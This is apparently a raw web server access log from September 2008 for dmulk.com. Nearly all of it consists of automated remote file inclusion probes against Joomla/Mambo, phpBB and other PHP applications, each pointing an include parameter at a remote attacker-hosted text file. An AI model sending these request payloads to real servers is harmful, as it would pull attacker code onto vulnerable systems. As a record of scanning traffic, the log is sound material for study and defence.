74.6.22.103 - - [22/Sep/2008:09:11:33 -0700] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/?show=slide HTTP/1.0" 200 7907 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:11:37 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.254.61.170 - - [22/Sep/2008:09:11:43 -0700] "GET /logs//administrator/index.php?option=com_videodb=&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.61.170 - - [22/Sep/2008:09:11:44 -0700] "GET //administrator/index.php?option=com_videodb=&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:11:46 -0700] "GET /logs/access_080804.log/print.php?page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:11:46 -0700] "GET /print.php?page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:11:46 -0700] "GET /logs/print.php?page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:11:48 -0700] "GET /logs/access_080602.log/print.php?page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.141.49 - - [22/Sep/2008:09:12:43 -0700] "GET /logs/access_080820.log//administrator/index.php?option=com_rwcards=&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.141.49 - - [22/Sep/2008:09:12:59 -0700] "GET /logs/access_080803.log//administrator/index.php?option=com_rwcards=&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.17.6.7 - - [22/Sep/2008:09:13:31 -0700] "GET /logs/access_080724.log/errors.php?error=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
89.208.43.121 - - [22/Sep/2008:09:14:05 -0700] "GET /logs/access_071228.log//components/com_simpleboard/image_upload.php?sbp=http://www.citoyennete-active.org/mambots/content/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:14:12 -0700] "GET /logs/access_080129.log//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:14:12 -0700] "GET //inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:14:19 -0700] "GET /logs//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:09:14:26 -0700] "GET /logs//sef.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:09:14:26 -0700] "GET //sef.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:09:14:26 -0700] "GET /logs/access_080304.log//sef.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.74.198.93 - - [22/Sep/2008:09:14:41 -0700] "GET //atom.php5?page=http://www.visionsnet.com/links/mylinks/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:15:17 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:15:17 -0700] "GET /logs/access_080209.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.17.6.7 - - [22/Sep/2008:09:15:24 -0700] "GET /logs/access_080905.log/errors.php?error=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:15:25 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.52.139.226 - - [22/Sep/2008:09:15:44 -0700] "GET //modules/Forums/admin/admin_groups.php?phpbb_root_path=http://projectspinnaker.com/leandertennis/images/_MD.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
74.52.139.226 - - [22/Sep/2008:09:15:44 -0700] "GET /logs//modules/Forums/admin/admin_groups.php?phpbb_root_path=http://projectspinnaker.com/leandertennis/images/_MD.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:16:07 -0700] "GET /logs/access_080602.log%20/print.php?page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.170.196.15 - - [22/Sep/2008:09:16:12 -0700] "GET /logs/access_080820.log//modules/calendar/calendar.class.php?baseDir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.170.196.15 - - [22/Sep/2008:09:16:12 -0700] "GET //modules/calendar/calendar.class.php?baseDir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.170.196.15 - - [22/Sep/2008:09:16:13 -0700] "GET /logs//modules/calendar/calendar.class.php?baseDir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.170.196.15 - - [22/Sep/2008:09:16:13 -0700] "GET /logs/access_080714.log//modules/calendar/calendar.class.php?baseDir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.141.49 - - [22/Sep/2008:09:16:33 -0700] "GET /logs/access_080901.log//includes/get_header.php?vwar_root=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:16:42 -0700] "GET /logs/access_080826.log%20/errors.php?error=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:16:42 -0700] "GET /errors.php?error=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:16:42 -0700] "GET /logs/errors.php?error=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:09:16:45 -0700] "GET /logs/access_080826.log//authentication/errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:09:16:45 -0700] "GET //authentication/errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:09:16:45 -0700] "GET /logs//authentication/errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.122.81.86 - - [22/Sep/2008:09:16:57 -0700] "GET /logs/access.log//modules/character_roster/include.php?mod_root=http://geocities.com/jticrew/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.122.81.86 - - [22/Sep/2008:09:16:58 -0700] "GET //modules/character_roster/include.php?mod_root=http://geocities.com/jticrew/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.122.81.86 - - [22/Sep/2008:09:16:58 -0700] "GET /logs//modules/character_roster/include.php?mod_root=http://geocities.com/jticrew/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.169.141.49 - - [22/Sep/2008:09:16:59 -0700] "GET /logs/access_080816.log//includes/get_header.php?vwar_root=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.244.233.121 - - [22/Sep/2008:09:17:06 -0700] "GET //inc/header.php/step_one.php?server_inc=http://83.19.144.26/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [22/Sep/2008:09:17:06 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://83.19.144.26/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [22/Sep/2008:09:17:07 -0700] "GET /logs/access_080409.log//inc/header.php/step_one.php?server_inc=http://83.19.144.26/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [22/Sep/2008:09:17:07 -0700] "GET /logs/access_080410.log//inc/header.php/step_one.php?server_inc=http://83.19.144.26/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:09:17:08 -0700] "GET /logs/access_071214.log//?_zb_path=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:09:17:09 -0700] "GET /logs/access_080309.log/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:09:17:09 -0700] "GET /logs//?_zb_path=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 200 66168 "-" "libwww-perl/5.814" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:09:17:09 -0700] "GET /logs/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:09:17:12 -0700] "GET //?_zb_path=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 200 94832 "-" "libwww-perl/5.814" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:09:17:12 -0700] "GET /index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 200 94976 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:17:23 -0700] "GET /logs/access_080129.log//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:17:23 -0700] "GET //inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:17:30 -0700] "GET /logs//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:09:17:31 -0700] "GET /logs/access_080725.log/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:09:17:36 -0700] "GET /logs/access_080817.log//authentication/errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.79.245.90 - - [22/Sep/2008:09:17:43 -0700] "GET /logs/access_080524.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:17:45 -0700] "GET /logs/access_080502.log//?path%5Bdocroot%5D=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.59.5.135 - - [22/Sep/2008:09:17:53 -0700] "GET /logs/access_080524.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.efeyl.org/wiki/backups/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [22/Sep/2008:09:18:07 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://phase-lm.co.uk/language/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
200.93.147.155 - - [22/Sep/2008:09:18:07 -0700] "GET /lostpasswd.php?env[include_prefix]=http://phase-lm.co.uk/language/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:18:09 -0700] "GET /includes/useragent.inc.php?prefix=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:18:11 -0700] "GET /logs/includes/useragent.inc.php?prefix=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:18:14 -0700] "GET /logs/access_080602.log%20/show.php?page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:18:17 -0700] "GET /logs/access_080629.log%20/show.php?page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.123.216.231 - - [22/Sep/2008:09:19:03 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.216.231 - - [22/Sep/2008:09:19:03 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:19:18 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:19:23 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:09:19:27 -0700] "GET /logs/access_080331.log//?_zb_path=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:09:19:36 -0700] "GET /logs/access_080706.log/index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:09:19:36 -0700] "GET /logs/index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.208.186 - - [22/Sep/2008:09:19:37 -0700] "GET /logs/access_080524.log%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://l0calh0st.100webspace.net/osi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:09:19:37 -0700] "GET /index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 200 94958 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:09:19:41 -0700] "GET /logs/access_080615.log/index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:20:21 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:20:22 -0700] "GET /logs/access_080415.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.40.7.214 - - [22/Sep/2008:09:20:32 -0700] "GET /logs/access_080611.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.40.7.214 - - [22/Sep/2008:09:20:34 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 95312 "-" "libwww-perl/5.803" "www.dmulk.com"
66.40.7.214 - - [22/Sep/2008:09:20:34 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.182.184.197 - - [22/Sep/2008:09:21:00 -0700] "GET /logs/access_080425.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.webana.com//modules/Forums/admin/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.182.184.197 - - [22/Sep/2008:09:21:00 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.webana.com//modules/Forums/admin/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.182.184.197 - - [22/Sep/2008:09:21:00 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.webana.com//modules/Forums/admin/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.152.144.67 - - [22/Sep/2008:09:21:07 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.webana.com//modules/Forums/admin/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.152.144.67 - - [22/Sep/2008:09:21:07 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.webana.com//modules/Forums/admin/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.152.144.67 - - [22/Sep/2008:09:21:07 -0700] "GET /logs/access_080425.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.webana.com//modules/Forums/admin/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.182.184.197 - - [22/Sep/2008:09:21:08 -0700] "GET /logs/access_080731.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.webana.com//modules/Forums/admin/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.152.144.67 - - [22/Sep/2008:09:21:18 -0700] "GET /logs/access_080731.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.webana.com//modules/Forums/admin/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.238.228 - - [22/Sep/2008:09:21:55 -0700] "GET /logs/access_080901.log/vw_active_usr.php?dPconfig[root_dir]=http://www.geocities.com/ixan_xdet/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.238.228 - - [22/Sep/2008:09:21:55 -0700] "GET /vw_active_usr.php?dPconfig[root_dir]=http://www.geocities.com/ixan_xdet/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.238.228 - - [22/Sep/2008:09:21:55 -0700] "GET /logs/vw_active_usr.php?dPconfig[root_dir]=http://www.geocities.com/ixan_xdet/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:22:01 -0700] "GET /logs/access_080324.log/sablonlar/gunaysoft/gunaysoft.php?uzanti=http://www.syahrulazlan.com/login/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:22:02 -0700] "GET /sablonlar/gunaysoft/gunaysoft.php?uzanti=http://www.syahrulazlan.com/login/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:22:02 -0700] "GET /logs/sablonlar/gunaysoft/gunaysoft.php?uzanti=http://www.syahrulazlan.com/login/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.160.78.135 - - [22/Sep/2008:09:22:18 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.suryamassage.nl/suryamassage/images//stories/food/sistem.txt? HTTP/1.1" 200 95347 "-" "libwww-perl/5.76" "www.dmulk.com"
217.21.79.130 - - [22/Sep/2008:09:22:42 -0700] "GET /logs/access_070909.log HTTP/1.1" 200 75478 "http://search.yahoo.com/search?p=%2B7+++++++++++++++++%40yahoo.com++++++++++++++++++++++++++++++%40gmail.com+++++++++++++++++++++++++++txt&ei=UTF-8&fr=sfp&xargs=0&pstart=1&b=11&xa=Tm2o1owH88.n7nQfnoUrOw--,1222186123" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12" "www.dmulk.com"
217.21.79.130 - - [22/Sep/2008:09:22:48 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12" "www.dmulk.com"
217.21.79.130 - - [22/Sep/2008:09:22:49 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12" "www.dmulk.com"
82.192.68.65 - - [22/Sep/2008:09:22:50 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.65 - - [22/Sep/2008:09:22:50 -0700] "GET //include/write.php?dir=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.65 - - [22/Sep/2008:09:22:51 -0700] "GET /logs//include/write.php?dir=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.21.79.130 - - [22/Sep/2008:09:22:59 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12" "www.dmulk.com"
202.59.5.135 - - [22/Sep/2008:09:23:13 -0700] "GET /logs/access_080809.log/errors.php?error=http://www.efeyl.org/wiki/backups/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.59.5.135 - - [22/Sep/2008:09:23:13 -0700] "GET /errors.php?error=http://www.efeyl.org/wiki/backups/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.59.5.135 - - [22/Sep/2008:09:23:13 -0700] "GET /logs/errors.php?error=http://www.efeyl.org/wiki/backups/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.59.5.135 - - [22/Sep/2008:09:23:13 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.efeyl.org/wiki/backups/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:09:23:23 -0700] "GET /logs/access_080826.log%20/index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.21.79.130 - - [22/Sep/2008:09:23:36 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12" "www.dmulk.com"
82.192.68.65 - - [22/Sep/2008:09:23:56 -0700] "GET /logs/access_080708.log//include/write.php?dir=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:24:06 -0700] "GET /logs/access_080703.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
